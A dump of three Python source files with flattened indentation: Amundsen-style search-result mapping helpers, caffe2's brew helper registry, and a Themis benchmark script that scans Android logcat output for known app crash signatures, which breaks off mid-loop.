}
def map_dashboard_result(result: Dict) -> Dict:
return {
'type': 'dashboard',
'key': result.get('key', None),
'uri': result.get('uri', None),
'url': result.get('url', None),
'group_name': result.get('group_name', None),
'name': result.get('name', None),
'product': result.get('product', None),
'tag': result.get('tag', None),
'description': result.get('description', None),
'last_successful_run_timestamp': result.get('last_successful_run_timestamp', None),
'highlight': result.get('highlight', {}),
}
def map_table_result(result: Dict) -> Dict:
name = result.get('name') if result.get('name') else result.get('table')
return {
'type': 'table',
'key': result.get('key', None),
'name': name,
'cluster': result.get('cluster', None),
'description': result.get('description', None),
'database': result.get('database', None),
'schema': result.get('schema', None),
'schema_description': result.get('schema_description', None),
'badges': result.get('badges', None),
'last_updated_timestamp': result.get('last_updated_timestamp', None),
'highlight': result.get('highlight', None),
}
def map_feature_result(result: Dict) -> Dict:
return {
'type': 'feature',
'description': result.get('description', None),
'key': result.get('key', None),
'last_updated_timestamp': result.get('last_updated_timestamp', None),
'name': result.get('feature_name', None),
'feature_group': result.get('feature_group', None),
'version': result.get('version', None),
'availability': result.get('availability', None),
'entity': result.get('entity', None),
'badges': result.get('badges', None),
'status': result.get('status', None),
'highlight': result.get('highlight', {}),
}
def map_user_result(result: Dict) -> Dict:
user_result = dump_user(load_user(result))
user_result['type'] = 'user'
user_result['highlight'] = result.get('highlight', {})
return user_result
def generate_query_json(*, filters: Dict = {}, page_index: int, search_term: str) -> Dict:
"""
    Transforms the given parameters to the query json for the search service according to
the api defined at:
https://github.com/lyft/amundsensearchlibrary/blob/master/search_service/api/swagger_doc/table/search_table_filter.yml
https://github.com/lyft/amundsensearchlibrary/blob/master/search_service/api/swagger_doc/dashboard/search_dashboard_filter.yml
"""
return {
'page_index': int(page_index),
'search_request': {
'type': 'AND',
'filters': filters
},
'query_term': search_term
}
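# For example (values illustrative), generate_query_json(
#     filters={'schema': 'core'}, page_index=0, search_term='test') returns:
#   {'page_index': 0,
#    'search_request': {'type': 'AND', 'filters': {'schema': 'core'}},
#    'query_term': 'test'}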
def execute_search_document_request(request_json: str, method: str) -> int:
search_service_base = app.config['SEARCHSERVICE_BASE']
search_document_url = f'{search_service_base}/v2/document'
update_response = request_search(
url=search_document_url,
method=method,
headers={'Content-Type': 'application/json'},
data=request_json,
)
status_code = update_response.status_code
if status_code != HTTPStatus.OK:
LOGGER.info(f'Failed to execute {method} for {request_json} in searchservice, status code: {status_code}')
LOGGER.info(update_response.text)
return status_code
def generate_query_request(*, filters: List[Filter] = [],
resources: List[str] = [],
page_index: int = 0,
results_per_page: int = 10,
search_term: str,
highlight_options: Dict) -> SearchRequest:
return SearchRequest(query_term=search_term,
resource_types=resources,
page_index=page_index,
results_per_page=results_per_page,
filters=filters,
highlight_options=highlight_options)

# ---- source: ryfeus/lambda-packs :: /pytorch/source/caffe2/python/brew.py ----

## @package model_helper_api
# Module caffe2.python.model_helper_api
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import sys
import copy
import inspect
from past.builtins import basestring
from caffe2.python.model_helper import ModelHelper
# flake8: noqa
from caffe2.python.helpers.algebra import *
from caffe2.python.helpers.arg_scope import *
from caffe2.python.helpers.array_helpers import *
from caffe2.python.helpers.control_ops import *
from caffe2.python.helpers.conv import *
from caffe2.python.helpers.db_input import *
from caffe2.python.helpers.dropout import *
from caffe2.python.helpers.elementwise_linear import *
from caffe2.python.helpers.fc import *
from caffe2.python.helpers.nonlinearity import *
from caffe2.python.helpers.normalization import *
from caffe2.python.helpers.pooling import *
from caffe2.python.helpers.tools import *
from caffe2.python.helpers.train import *
class HelperWrapper(object):
_registry = {
'arg_scope': arg_scope,
'fc': fc,
'packed_fc': packed_fc,
'fc_decomp': fc_decomp,
'fc_sparse': fc_sparse,
'fc_prune': fc_prune,
'dropout': dropout,
'max_pool': max_pool,
'average_pool': average_pool,
'max_pool_with_index' : max_pool_with_index,
'lrn': lrn,
'softmax': softmax,
'instance_norm': instance_norm,
'spatial_bn': spatial_bn,
'spatial_gn': spatial_gn,
'relu': relu,
'prelu': prelu,
'tanh': tanh,
'concat': concat,
'depth_concat': depth_concat,
'sum': sum,
'transpose': transpose,
'iter': iter,
'accuracy': accuracy,
'conv': conv,
'conv_nd': conv_nd,
'conv_transpose': conv_transpose,
'group_conv': group_conv,
'group_conv_deprecated': group_conv_deprecated,
'image_input': image_input,
'video_input': video_input,
'add_weight_decay': add_weight_decay,
'elementwise_linear': elementwise_linear,
'layer_norm': layer_norm,
'batch_mat_mul' : batch_mat_mul,
'cond' : cond,
'loop' : loop,
'db_input' : db_input,
}
def __init__(self, wrapped):
self.wrapped = wrapped
def __getattr__(self, helper_name):
if helper_name not in self._registry:
raise AttributeError(
"Helper function {} not "
"registered.".format(helper_name)
)
def scope_wrapper(*args, **kwargs):
new_kwargs = {}
if helper_name != 'arg_scope':
if len(args) > 0 and isinstance(args[0], ModelHelper):
model = args[0]
elif 'model' in kwargs:
model = kwargs['model']
else:
raise RuntimeError(
"The first input of helper function should be model. " \
"Or you can provide it in kwargs as model=<your_model>.")
new_kwargs = copy.deepcopy(model.arg_scope)
func = self._registry[helper_name]
            var_names, _, varkw, _ = inspect.getargspec(func)
if varkw is None:
# this helper function does not take in random **kwargs
new_kwargs = {
var_name: new_kwargs[var_name]
for var_name in var_names if var_name in new_kwargs
}
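            # Merge precedence (lowest to highest): the model's stored
            # arg_scope, the current scope for this helper, then the
            # explicit call kwargs.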
cur_scope = get_current_scope()
new_kwargs.update(cur_scope.get(helper_name, {}))
new_kwargs.update(kwargs)
return func(*args, **new_kwargs)
scope_wrapper.__name__ = helper_name
return scope_wrapper
def Register(self, helper):
name = helper.__name__
if name in self._registry:
raise AttributeError(
"Helper {} already exists. Please change your "
"helper name.".format(name)
)
self._registry[name] = helper
def has_helper(self, helper_or_helper_name):
helper_name = (
helper_or_helper_name
if isinstance(helper_or_helper_name, basestring) else
helper_or_helper_name.__name__
)
return helper_name in self._registry
sys.modules[__name__] = HelperWrapper(sys.modules[__name__])
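# With the module object swapped for a HelperWrapper, helper lookups resolve
# through __getattr__ above; a typical call (illustrative shapes) looks like:
#   from caffe2.python import brew, model_helper
#   model = model_helper.ModelHelper(name="demo")
#   brew.fc(model, "data", "fc1", dim_in=16, dim_out=8)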

# ---- source: the-themis-benchmarks/home :: /scripts/check_crash_newmonkey.py ----

# This file aims to do quick crash checking
import csv
import datetime
import os
import shutil
import subprocess
import time
from argparse import ArgumentParser, Namespace
from typing import List, Dict, Set
ALL_APPS = ['ActivityDiary', 'AmazeFileManager', 'and-bible', 'AnkiDroid', 'APhotoManager', 'commons',
'collect', 'FirefoxLite', 'Frost', 'geohashdroid', 'MaterialFBook', 'nextcloud', 'Omni-Notes',
'open-event-attendee-android', 'openlauncher', 'osmeditor4android', 'Phonograph', 'Scarlet-Notes',
'sunflower', 'WordPress']
app_crash_data = {
'AnkiDroid': {
'#4200': ['com.ichi2.libanki.Note com.ichi2.libanki.Card.note()',
'com.ichi2.async.DeckTask.doInBackgroundUpdateNote(DeckTask.java',
'com.ichi2.async.DeckTask.doInBackground(DeckTask.java'],
'#4451': [
'android.support.design.widget.CoordinatorLayout$LayoutParams cannot be cast to android.widget.RelativeLayout$LayoutParams',
'com.ichi2.anki.AbstractFlashcardViewer.initLayout(AbstractFlashcardViewer.java',
'com.ichi2.anki.AbstractFlashcardViewer.onCollectionLoaded(AbstractFlashcardViewer.java',
'com.ichi2.anki.Reviewer.onCollectionLoaded(Reviewer.java',
'com.ichi2.anki.AnkiActivity.onLoadFinished(AnkiActivity.java'],
'#5638': ['com.ichi2.libanki.Utils.stripHTMLMedia',
'com.ichi2.libanki.Utils.stripHTML'],
'#4707': ['exposed beyond app through ClipData.Item.getUri()',
'com.ichi2.anki.AnkiActivity.startActivityForResult(AnkiActivity.java',
'com.ichi2.anki.multimediacard.fields.BasicImageFieldController$2.onClick(BasicImageFieldController.java'],
'#6145': ['com.ichi2.libanki.AnkiPackageExporter.exportInto(AnkiPackageExporter.java'],
'#5756': ['Unable to start activity ComponentInfo{com.ichi2.anki/com.ichi2.anki.Reviewer}',
'com.ichi2.anki.AbstractFlashcardViewer.restoreCollectionPreferences(AbstractFlashcardViewer.java',
'com.ichi2.anki.AbstractFlashcardViewer.onCollectionLoaded(AbstractFlashcardViewer.java',
'com.ichi2.anki.AnkiActivity.startLoadingCollection(AnkiActivity.java'],
'#4977': [
"Attempt to invoke virtual method 'boolean android.support.v7.widget.SearchView.isIconified()' on a null object reference",
'com.ichi2.anki.CardBrowser$20.onPostExecute(CardBrowser.java',
'com.ichi2.async.DeckTask$TaskListener.onPostExecute(DeckTask.java',
'com.ichi2.async.DeckTask.onPostExecute(DeckTask.java']
},
'ActivityDiary': {
'#118': ['java.lang.IllegalArgumentException: position (',
'de.rampro.activitydiary.ui.generic.DetailRecyclerViewAdapter.getDiaryImageIdAt(DetailRecyclerViewAdapter.java',
'de.rampro.activitydiary.ui.history.HistoryRecyclerViewAdapter$1.onClick(HistoryRecyclerViewAdapter.java'],
'#285': ['java.lang.NumberFormatException: For input string',
'de.rampro.activitydiary.ui.settings.SettingsActivity.updateLocationAge(SettingsActivity.java',
'de.rampro.activitydiary.ui.settings.SettingsActivity.onSharedPreferenceChanged(SettingsActivity.java']
},
'geohashdroid': {
'#73': ['java.lang.RuntimeException: An error occurred while executing doInBackground()',
'java.lang.String net.exclaimindustries.geohashdroid.util.Graticule.getLatitudeString(boolean)',
'net.exclaimindustries.geohashdroid.util.HashBuilder$StockRunner.runStock(HashBuilder.java',
'net.exclaimindustries.geohashdroid.services.StockService.onHandleWork(StockService.java']
},
'and-bible': {
'#261': ['java.lang.StackOverflowError: stack size',
'org.crosswire.jsword.index.lucene.LuceneIndex.generateSearchIndexImpl(LuceneIndex.java'],
'#375': ['kotlin.TypeCastException: null cannot be cast to non-null type org.crosswire.jsword.book.Book',
'net.bible.service.history.HistoryManager.setDumpString(HistoryManager.kt',
'net.bible.android.view.activity.page.MainBibleActivity.openTab(MainBibleActivity.kt'],
'#480': ['net.bible.service.db.bookmark.BookmarkDBAdapter.updateLabel(BookmarkDBAdapter.kt',
'net.bible.android.control.bookmark.BookmarkControl.saveOrUpdateLabel(BookmarkControl.kt',
'net.bible.android.view.activity.bookmark.LabelDialogs$1.onClick(LabelDialogs.java'],
'#697': [
'Unable to start activity ComponentInfo{net.bible.android.activity/net.bible.android.view.activity.mynote.MyNotes}',
'net.bible.android.control.versification.sort.VersificationPrioritiser.getVersifications(VersificationPrioritiser.java',
'net.bible.android.control.versification.sort.ConvertibleVerseRangeComparator$Builder.withMyNotes(ConvertibleVerseRangeComparator.java'],
'#703': ['org.crosswire.jsword.index.IndexStatus org.crosswire.jsword.book.Book.getIndexStatus()',
'net.bible.android.view.activity.search.SearchIndexProgressStatus.jobFinished(SearchIndexProgressStatus.java',
'net.bible.android.view.activity.base.ProgressActivityBase$initialiseView$uiUpdaterRunnable$1.run(ProgressActivityBase.kt']
},
'AmazeFileManager': {
'#1232': ['Failure delivering result ResultInfo',
"Attempt to invoke virtual method 'java.lang.Object java.util.ArrayList.get(int)' on a null object reference",
'com.amaze.filemanager.activities.MainActivity.onActivityResult(MainActivity.java',
],
'#1558': ["com.amaze.filemanager.exceptions.StreamNotFoundException: Can't get stream",
"com.amaze.filemanager.filesystem.FileUtil.getOutputStream(FileUtil.java",
"com.amaze.filemanager.filesystem.FileUtil.isWritable(FileUtil.java",
'com.amaze.filemanager.asynchronous.asynctasks.WriteFileAbstraction.doInBackground'],
'#1796': ["java.lang.IndexOutOfBoundsException: Index:",
'com.amaze.filemanager.asynchronous.asynctasks.DeleteTask.onPostExecute(DeleteTask.java'],
'#1837': ['java.lang.IndexOutOfBoundsException: Index:',
'com.amaze.filemanager.adapters.glide.RecyclerPreloadModelProvider.getPreloadItems(RecyclerPreloadModelProvider.java',
'com.bumptech.glide.ListPreloader.preload(ListPreloader.java',
'com.bumptech.glide.integration.recyclerview.RecyclerToListViewScrollListener.onScrolled(RecyclerToListViewScrollListener.java']
},
'FirefoxLite': {
'#4881': ['org.json.JSONException: End of input at character',
'org.mozilla.rocket.util.JsonUtilsKt.toJsonArray(JsonUtils.kt',
'org.mozilla.rocket.home.contenthub.data.ContentHubRepoKt.jsonStringToTypeList(ContentHubRepo.kt',
'org.mozilla.rocket.home.contenthub.data.ContentHubRepo$getReadTypesLive$1.invoke(ContentHubRepo.kt',
'org.mozilla.rocket.extension.LiveDataExtensionKt$sam$androidx_arch_core_util_Function$0.apply(LiveDataExtension.kt)',
'org.mozilla.focus.activity.MainActivity.onStart(MainActivity.kt',
],
'#4942': [
'java.lang.RuntimeException: Cannot create an instance of class org.mozilla.rocket.home.HomeViewModel',
'java.lang.InstantiationException: java.lang.Class<org.mozilla.rocket.home.HomeViewModel> has no zero argument constructor',
'org.mozilla.focus.tabs.tabtray.TabTrayFragment.onCreateView(TabTrayFragment.java'],
'#5085': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.String android.os.BaseBundle.getString(java.lang.String)' on a null object reference",
'org.mozilla.focus.settings.SettingsFragment.onCreate(SettingsFragment.kt']
},
'open-event-attendee-android': {
'#2198': [
'org.fossasia.openevent.general.search.SearchFragment$onCreateView$3.onClick(SearchFragment.kt',
# special handling for combo, which discarded the line number on this case
# 'org.fossasia.openevent.general.search.SearchFilterFragment$setFilters$3.onClick(SearchFilterFragment.kt:127)',
'org.fossasia.openevent.general.search.type.SearchTypeFragment.<init>(SearchTypeFragment.kt']
},
'openlauncher': {
'#67': ['java.lang.SecurityException: Not allowed to change Do Not Disturb state',
'com.benny.openlauncher.util.LauncherAction.RunAction(LauncherAction.java',
'com.benny.openlauncher.activity.Home$11.onItemClick(Home.java']
},
'APhotoManager': {
'#116': ['Error inflating class de.k3b.android.widgets.EditTextPreferenceWithSummary',
'de.k3b.android.androFotoFinder.SettingsActivity.onCreate(SettingsActivity.java']
},
'sunflower': {
'#239': [
'java.lang.IllegalArgumentException: navigation destination com.google.samples.apps.sunflower:id/action_plant_list_fragment_to_plant_detail_fragment is unknown to this NavController',
'com.google.samples.apps.sunflower.adapters.PlantAdapter$createOnClickListener$1.onClick(PlantAdapter.kt']
},
'collect': {
'#3222': ["java.lang.IllegalArgumentException: column 'MAX(date)' does not exist",
'org.odk.collect.android.activities.FormChooserList.onLoadFinished(FormChooserList.java']
},
'MaterialFBook': {
'#224': ['android.content.res.Resources$NotFoundException: Resource ID #0x20b001b',
'org.chromium.ui.base.DeviceFormFactor.b(PG',
'org.chromium.ui.base.DeviceFormFactor.a(PG',
'bCE.onCreateActionMode(PG',
'org.chromium.content.browser.selection.SelectionPopupControllerImpl.y(PG',
'org.chromium.content.browser.selection.SelectionPopupControllerImpl.showSelectionMenu(PG']
},
'Omni-Notes': {
'#745': ['No virtual method fitCenter()Lcom/bumptech/glide/request/RequestOptions',
'it.feio.android.simplegallery.GalleryPagerFragment.onCreateView(GalleryPagerFragment.java']
},
'OmniNotes': {
'#745': ['No virtual method fitCenter()Lcom/bumptech/glide/request/RequestOptions',
'it.feio.android.simplegallery.GalleryPagerFragment.onCreateView(GalleryPagerFragment.java']
},
'Phonograph': {
'#112': ['com.kabouzeid.gramophone.appshortcuts.AppShortcutLauncherActivity.startServiceWithSongs']
},
'osmeditor': {
'#637': [
"Attempt to invoke interface method 'java.util.Set java.util.Map.entrySet()' on a null object reference"],
'#705': [
"android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views",
"de.blau.android.propertyeditor.PresetFragment$3.doInBackground(PresetFragment.java:258)",
"de.blau.android.propertyeditor.PresetFragment$3.doInBackground(PresetFragment.java:244)"],
'#729': [
"android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views",
"de.blau.android.propertyeditor.PresetFragment$3.doInBackground(PresetFragment.java:258)",
"de.blau.android.propertyeditor.PresetFragment$3.doInBackground(PresetFragment.java:244)"]
},
'Scarlet-Notes': {
'#114': ['java.lang.Exception: Invalid Search Mode',
'com.maubis.scarlet.base.support.SearchConfigKt.getNotesForMode(SearchConfig.kt',
'com.maubis.scarlet.base.support.SearchConfigKt.filterSearchWithoutFolder(SearchConfig.kt',
'com.maubis.scarlet.base.support.SearchConfigKt.unifiedSearchSynchronous(SearchConfig.kt',
'com.maubis.scarlet.base.MainActivity$unifiedSearchSynchronous$$inlined$map$lambda$1.invokeSuspend(MainActivity.kt']
},
'Frost': {
'#1323': [
"java.net.UnknownHostException: Unable to resolve host \"m.facebook.com\": No address associated with hostname",
"com.pitchedapps.frost.fragments.FrostParserFragment.reloadImpl$suspendImpl(RecyclerFragmentBase.kt",
"com.pitchedapps.frost.fragments.FrostParserFragment.reloadImpl(Unknown Source",
"com.pitchedapps.frost.fragments.RecyclerFragment$reload$2.invokeSuspend(RecyclerFragmentBase.kt"]
},
'commons': {
'#1385': ['java.lang.NullPointerException: Callable returned null'],
'#1391': ["fr.free.nrw.commons.nearby.NearbyMapFragment$8.onStateChanged(NearbyMapFragment.java"],
'#1581': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'double android.location.Location.getLatitude()' on a null object reference",
"fr.free.nrw.commons.location.LatLng.from(LatLng.java",
'fr.free.nrw.commons.location.LocationServiceManager.getLKL(LocationServiceManager.java',
'fr.free.nrw.commons.nearby.NearbyActivity.onRequestPermissionsResult(NearbyActivity.java'],
'#2123': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'android.support.v4.app.FragmentActivity android.support.v4.app.Fragment.getActivity()' on a null object reference",
'fr.free.nrw.commons.media.MediaDetailPagerFragment$MediaDetailAdapter.getItem(MediaDetailPagerFragment.java'],
'#3244': ['fr.free.nrw.commons.upload.UploadActivity.receiveInternalSharedItems(UploadActivity.java']
},
'nextcloud': {
'#1918': [
'java.lang.ClassCastException: com.owncloud.android.ui.preview.PreviewImageActivity cannot be cast to com.owncloud.android.ui.activity.FileDisplayActivity',
'com.owncloud.android.ui.preview.PreviewImageFragment.onOptionsItemSelected(PreviewImageFragment.java'],
'#4026': [
'java.lang.RuntimeException: Unable to start activity ComponentInfo{com.nextcloud.client/com.owncloud.android.ui.activity.FileDisplayActivity}',
'com.owncloud.android.ui.activity.ToolbarActivity.setupToolbar(ToolbarActivity.java',
'com.owncloud.android.ui.activity.FileDisplayActivity.onCreate(FileDisplayActivity.java'],
'#4792': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.String com.owncloud.android.datamodel.OCFile.getRemotePath()' on a null object reference",
'com.owncloud.android.ui.dialog.CreateFolderDialogFragment.onClick(CreateFolderDialogFragment.java'],
'#5173': ['android.view.MenuItem android.view.MenuItem.setVisible(boolean)',
'com.owncloud.android.ui.fragment.OCFileListFragment.onPrepareOptionsMenu(OCFileListFragment.java']
},
'WordPress': {
'#6530': ['org.wordpress.android.fluxc.store.PostStore.onAction(PostStore.java'],
'#7182': [
'org.wordpress.android.login.LoginUsernamePasswordFragment.onSiteChanged(LoginUsernamePasswordFragment.java'],
'#8659': [
'Two different ViewHolders have the same stable ID. Stable IDs in your adapter MUST BE unique and SHOULD NOT change.'],
'#10302': [
'org.wordpress.android.login.LoginBaseFormFragment.onOptionsItemSelected(LoginBaseFormFragment.java'],
'#10363': ['java.lang.IllegalStateException: itemView.findViewById(R.id.container) must not be null',
'org.wordpress.android.ui.posts.PostListItemViewHolder.<init>(PostListItemViewHolder.kt',
'org.wordpress.android.ui.posts.PostListItemViewHolder$Compact.<init>(PostListItemViewHolder.kt',
'org.wordpress.android.ui.posts.adapters.PostListAdapter.onCreateViewHolder(PostListAdapter.kt'
],
'#10547': [
'start activity ComponentInfo{org.wordpress.android/org.wordpress.android.ui.posts.EditPostActivity}: java.lang.IllegalArgumentException: PostLoadingState wrong value 6',
'org.wordpress.android.ui.posts.EditPostActivity$PostLoadingState.fromInt(EditPostActivity.java',
'org.wordpress.android.ui.posts.EditPostActivity.onCreate(EditPostActivity.java'
],
'#10876': ['in WithSelect(WithDispatch(WithViewportMatch(WithPreferredColorScheme(Component))))'],
'#11135': [
'java.lang.IllegalStateException: siteStore.getSiteBySiteI…t.getLong(EXTRA_SITE_ID)) must not be null',
'org.wordpress.android.ui.CommentFullScreenDialogFragment.onCreateView(CommentFullScreenDialogFragment.kt'],
'#11992': [
"java.lang.NullPointerException: Attempt to invoke virtual method 'boolean org.wordpress.android.ui.FilteredRecyclerView.isRefreshing()' on a null object reference",
'org.wordpress.android.ui.reader.ReaderPostListFragment.onSaveInstanceState(ReaderPostListFragment.java']
}
}
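# app_crash_data maps an app name to its known issues; each issue id maps to a list
# of signature substrings that must ALL appear in a single logcat stack trace for
# that trace to be counted as the target crash (see the matching loop in main()).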
def get_testing_result_dir(all_testing_result_dirs, app_name, issue_id):
tmp_paths = []
for result_dir_path in all_testing_result_dirs:
result_dir_basename = os.path.basename(result_dir_path)
if app_name in result_dir_basename and issue_id in result_dir_basename:
tmp_paths.append(result_dir_path)
return tmp_paths
def get_app_name(testing_result_dir):
for app_name in ALL_APPS:
if os.path.basename(testing_result_dir).startswith(app_name):
return app_name
print("Warning: cannot find app name for this testing result dir: %s" % testing_result_dir)
def get_apk_info(testing_result_dir: str, app_name: str):
base_name = os.path.basename(testing_result_dir)
target_apk_file_name = str(base_name.split(".apk")[0]) + ".apk"
target_apk_file_path = os.path.join("../" + app_name, target_apk_file_name)
get_app_package_name_cmd = "aapt dump badging " + target_apk_file_path + " | grep package | awk '{print $2}' | sed s/name=//g | sed s/\\'//g"
app_package_name = ""
try:
p = subprocess.Popen(get_app_package_name_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        # read and decode the aapt output
app_package_name = p.communicate()[0].decode('utf-8').strip()
print(app_package_name)
except os.error as e:
print(e)
return target_apk_file_name, app_package_name
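# A usage sketch (hypothetical paths and names, for illustration only; the real
# values depend on the local result-dir layout, and `aapt` must be on PATH):
#   get_apk_info("results/ActivityDiary-debug.apk-monkey-run1", "ActivityDiary")
#   -> ("ActivityDiary-debug.apk", "<package name reported by aapt>")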
def main(args: Namespace):
# collect all testing result dirs
all_testing_results_dirs = []
subdirs = os.listdir(args.o)
for subdir in subdirs:
# print(subdir)
subdir_path = os.path.join(args.o, subdir)
if os.path.isdir(subdir_path):
all_testing_results_dirs.append(subdir_path)
# print(all_testing_results_dirs)
    # this dict is only used for collecting non-target crashes
# key: the apk file name
# value: list of signatures of crash stacks
other_crashes_signature_str_dict: Dict[str, List[str]] = {}
other_crashes_complete_exception_trace_dict: Dict[str, List[List[str]]] = {}
# check crash
for app_name in app_crash_data:
if args.app_name is not None and args.app_name != app_name:
# skip unrelated apps if args.app_name is given
continue
# if args.monkey and app_name == "ActivityDiary":
# # TODO special check for Monkey's ActivityDiary [should be removed in the future]
# continue
        print(app_name)
issue_crash_data = app_crash_data[app_name]
for issue_id in issue_crash_data:
if args.issue_id is not None and args.issue_id != issue_id:
# skip unrelated issues if args.issue_id is given
continue
issue_testing_result_dirs = get_testing_result_dir(all_testing_results_dirs,
app_name,
issue_id)
if len(issue_testing_result_dirs) == 0:
continue
log_tag_name = '[' + app_name + ', ' + issue_id + '] '
print("\n\n=========")
crash_signature_strs = issue_crash_data[issue_id]
# scanning the testing results of the given issue
for result_dir in issue_testing_result_dirs:
                logcat_file_path = ""
                testing_time_file_path = ""
                login_file_path = ""
                # default timestamp layout; the tool-specific branches below may override it
                testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.monkey:
# Monkey
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"monkey_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.ape:
# Ape
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"ape_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.combo:
# ComboDroid
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"combo_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H-%M-%S'
if args.timemachine:
# TimeMachine
logcat_file_path = os.path.join(result_dir, "timemachine-output/crashes.log")
login_file_path = os.path.join(result_dir, "timemachine-run.log")
testing_time_file_path = os.path.join(result_dir,
"timemachine-output/run_time.log")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.humanoid:
# Humanoid
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"humanoid_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.sapienz:
# Sapienz
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"sapienz_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.qtesting:
# Q-testing
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"qtesting_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.weighted:
                    # Weighted
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"weighted_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.fastbot:
# Fastbot
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"fastbot_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.wetest:
# WeTest
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"wetest_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if args.newmonkey:
# Newmonkey
logcat_file_path = os.path.join(result_dir, "logcat.log")
login_file_path = os.path.join(result_dir, "login.log")
testing_time_file_path = os.path.join(result_dir,
"newmonkey_testing_time_on_emulator.txt")
testing_time_datetime_str = '%Y-%m-%d-%H:%M:%S'
if os.path.exists(logcat_file_path) and os.path.exists(testing_time_file_path):
print('\n')
print(log_tag_name + 'scanning (%s) ' % os.path.basename(result_dir))
                    with open(testing_time_file_path, 'r') as testing_time_file:
                        lines = testing_time_file.readlines()
for line in lines:
print(log_tag_name + 'testing time: %s ' % line.strip())
if len(lines) == 0:
                        # the testing-time file is empty, i.e., this run has no recorded testing time
print(log_tag_name + 'this run does not have recorded testing time, skip this run!')
continue
time.sleep(1)
# get the start testing datetime
if args.timemachine:
# special handle timemachine
start_testing_datetime_str = lines[0][0:19]
else:
start_testing_datetime_str = lines[0].strip()
print("the start testing time is: %s" % start_testing_datetime_str)
start_testing_datetime_obj = datetime.datetime.strptime(start_testing_datetime_str,
testing_time_datetime_str)
print("the start testing time (parsed) is: %s" % start_testing_datetime_obj)
if os.path.exists(login_file_path):
cmd = 'grep ' + "\"" + "Login SUCCESS" + "\" " + login_file_path
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
                        # read and decode the grep output
output = p.communicate()[0].decode('utf-8').strip()
if len(output) != 0:
print(log_tag_name + "Login SUCCESS")
else:
print(log_tag_name + "Login FAIL?")
# split the logcat file into separate stack traces
crash_stack_traces: Dict[str, List[str]] = {}
logcat_file = open(logcat_file_path, 'r')
if args.timemachine:
if not args.other_crashes:
# special handle for TimeMachine (for target crash)
cache_list = []
for line in logcat_file.readlines():
if line.startswith("---"):
continue
if line.startswith("["):
time_label = line.strip()
crash_stack_traces[time_label] = cache_list
cache_list = []
else:
cache_list.append(line)
else:
# special handle for TimeMachine (for non-target crash)
fake_time_label_index = 1
fake_time_label = "fake_time_"
for line in logcat_file.readlines():
                                if line.startswith("---") or line.startswith("["):
                                    # a separator line starts a new pseudo stack trace
                                    fake_time_label_index += 1
                                    fake_time_label = "fake_time_" + str(fake_time_label_index)
                                    continue
if fake_time_label not in crash_stack_traces:
crash_stack_traces[fake_time_label] = [line]
else:
crash_stack_traces[fake_time_label].append(line)
else:
for line in logcat_file.readlines():
if line.startswith("---"):
continue
                            # positions of every ':' in the line; in logcat's "threadtime"
                            # format the third ':' ends the "<date> <time> <pid> <tid> <level> <tag>:" prefix
                            res = [i for i in range(len(line)) if line.startswith(':', i)]
                            try:
                                time_label = line[0:res[2]]  # the third ":" is the split point
                            except IndexError:
                                print("Caught IndexError when parsing logcat!")
                                continue
if time_label not in crash_stack_traces:
crash_stack_traces[time_label] = [line]
else:
crash_stack_traces[time_label].append(line)
logcat_file.close()
if args.other_crashes:
                    # count the other crashes that were detected as a by-product
app_dir_name = get_app_name(result_dir)
apk_file_name, app_package_name = get_apk_info(result_dir, app_dir_name)
print("apk file name: %s" % apk_file_name)
print("apk package name: %s" % app_package_name)
if app_package_name.endswith(".debug") or app_package_name.endswith(".debug.ting"):
app_package_name = app_package_name.split(".debug")[0]
if app_package_name.endswith(".client"):
app_package_name = "com.owncloud.android"
if app_package_name.endswith(".activity"):
app_package_name = app_package_name.split(".activity")[0]
if app_package_name.endswith(".quicknote"):
app_package_name = "com.maubis.scarlet"
if app_package_name.endswith(".attendee"):
app_package_name = "org.fossasia.openevent"
for time_label in crash_stack_traces:
if args.timemachine:
# Special handling on timemachine
target_stack = crash_stack_traces[time_label]
